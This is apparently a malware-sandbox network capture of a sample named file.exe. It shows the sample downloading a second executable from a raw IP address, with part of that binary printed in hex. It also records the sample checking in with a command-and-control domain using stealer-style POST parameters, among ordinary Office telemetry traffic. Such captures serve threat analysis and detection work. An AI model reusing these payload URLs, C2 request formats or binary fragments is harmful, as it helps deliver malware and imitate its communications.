                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.749760185.215.113.16806908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Nov 23, 2024 19:52:43.177892923 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:44.613611937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:44 GMT
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Content-Length: 2801152
                                                                                                                                                                                  Last-Modified: Sat, 23 Nov 2024 18:36:55 GMT
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  ETag: "674220c7-2abe00"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 63 3a 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+c:+`Ui` @ @.rsrc`2@.idata 8@bqkfoemv`*^*:@wtifjdmh +*@.taggant@ +"*@
                                                                                                                                                                                  Nov 23, 2024 19:52:44.613714933 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.613924980 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614106894 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614116907 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614124060 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614134073 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614139080 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614270926 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                  Nov 23, 2024 19:52:44.614283085 CET1236INData Raw: d0 d4 8d 29 aa 10 e5 a3 22 02 f5 d4 df dd 0a 0e eb 1b b4 e9 73 a1 ed 53 d3 ee d9 17 c5 0f 55 b4 95 f0 90 48 db 94 b2 74 95 2f 9c fa eb 1e 32 93 6d 48 7d 05 8e 1c 33 3b 1b b3 0b 7e fd fb e7 b1 11 9e cc 53 a0 ee fd e1 e9 f6 ca 6b 08 72 a8 30 8b fe
                                                                                                                                                                                  Data Ascii: )"sSUHt/2mH}3;~Skr0-h-E5!e*R,nZfT}ZMsB8^E",900BR0*@l0/>)-7$.p#1%<d0<:'(
                                                                                                                                                                                  Nov 23, 2024 19:52:44.735467911 CET1236INData Raw: 92 0b 30 19 67 cf 8e 43 2f c2 cc 0e 6a 52 c7 2a 7a cd b8 48 aa a2 8c 45 67 b1 9d 14 a7 0f 01 2b 2d ce bf 4d 85 cb e4 da c5 c2 95 4b ca 2c bb 43 7d 45 8a b9 c9 46 f1 eb cf f4 83 27 17 8c a7 d8 c9 f1 42 cb 59 51 46 da d3 04 ec f1 b6 8e df 42 c7 3e
                                                                                                                                                                                  Data Ascii: 0gC/jR*zHEg+-MK,C}EF'BYQFB>yqEI?'sV3y'##evV)jG'<DT)J |KUzUe|y?;T0bPz`P'3t*jbai?V


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.749701104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:17 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                  2024-11-23 18:52:17 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:17 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=06358k55sn55kmcb3dm9od610a; expires=Wed, 19-Mar-2025 12:38:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pBDH%2FaaRIDD8FkrzT2NjPkz3uEvccmsLTU7j5YAnmJDNQgrcrqO4xHpWGskrDBJCl8%2B9dyibDeeRCjfl18UhLUX%2FP7mSeHdn4zRjIKiNz7JurdoHzRriP%2BXoBD6W%2F9lGAu%2BDt1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b01aef78c60-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1499743&cwnd=215&unsent_bytes=0&cid=5d19c84c941624d5&ts=702&x=0"
                                                                                                                                                                                  2024-11-23 18:52:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                  2024-11-23 18:52:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  1192.168.2.74970213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:19 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:20 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:20 GMT
                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                  Content-Length: 218853
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public
                                                                                                                                                                                  Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                  ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                  x-ms-request-id: ac3306f4-b01e-00ab-523b-3ddafd000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185220Z-15b8b599d88l2dpthC1TEBmzr0000000037000000000fufg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:20 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                  Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                  Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                  2024-11-23 18:52:20 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.749703104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:19 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:19 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:20 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=sou3ssr5detbqtopsdfdm2oerl; expires=Wed, 19-Mar-2025 12:38:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2Brp3u4lafjkehw%2B9qcoUa5IhJhU1Eac7FLi78TktxGU%2FMZi8mxOrDyFAELN%2F3kVqcVBD%2BK2bDwdSWqz6FtNgNEX%2B88OLdBgzsd45QPEBdWbr0nl6xCOLQ493jXGz%2FKg2%2BjNs6I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
